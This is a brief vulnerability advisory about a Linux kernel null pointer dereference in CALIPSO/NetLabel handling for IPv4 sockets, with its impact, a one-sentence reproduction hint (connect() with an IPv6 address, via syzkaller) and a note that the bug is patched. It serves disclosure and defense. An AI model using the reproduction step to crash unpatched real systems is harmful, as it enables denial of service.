Linux Kernel Calipso Function Null Pointer Dereference Vulnerability in IPv4 Sockets

A null pointer dereference vulnerability has been identified in the Linux kernel's handling of Calipso functions for IPv4 sockets. The issue arises in the 'txopt_get()' function, where a null pointer dereference occurs because the 'ipv6_txoptions' structure is not properly initialized for IPv4 sockets. This vulnerability is rooted in inadequate validation within the 'netlbl_conn_setattr()' function, which fails to ensure that the address family of the socket matches the one being used. As a result, an attacker could potentially exploit this by connecting an IPv6 address to an IPv4 socket, leading to a general protection fault.

Impact

Exploitation of this vulnerability causes a general protection fault due to a null pointer dereference, which can disrupt system operations and potentially be exploited to execute arbitrary code.

Reproduction

The vulnerability can be reproduced by calling the 'connect()' function with an IPv6 address on an IPv4 socket. This can be done using a fuzzing tool like 'syzkaller', which automates the process of sending such requests to the kernel.

Remediation

The vulnerability has been addressed in the official Linux Git repository. Users should upgrade to the latest version of the Linux kernel where this vulnerability has been patched.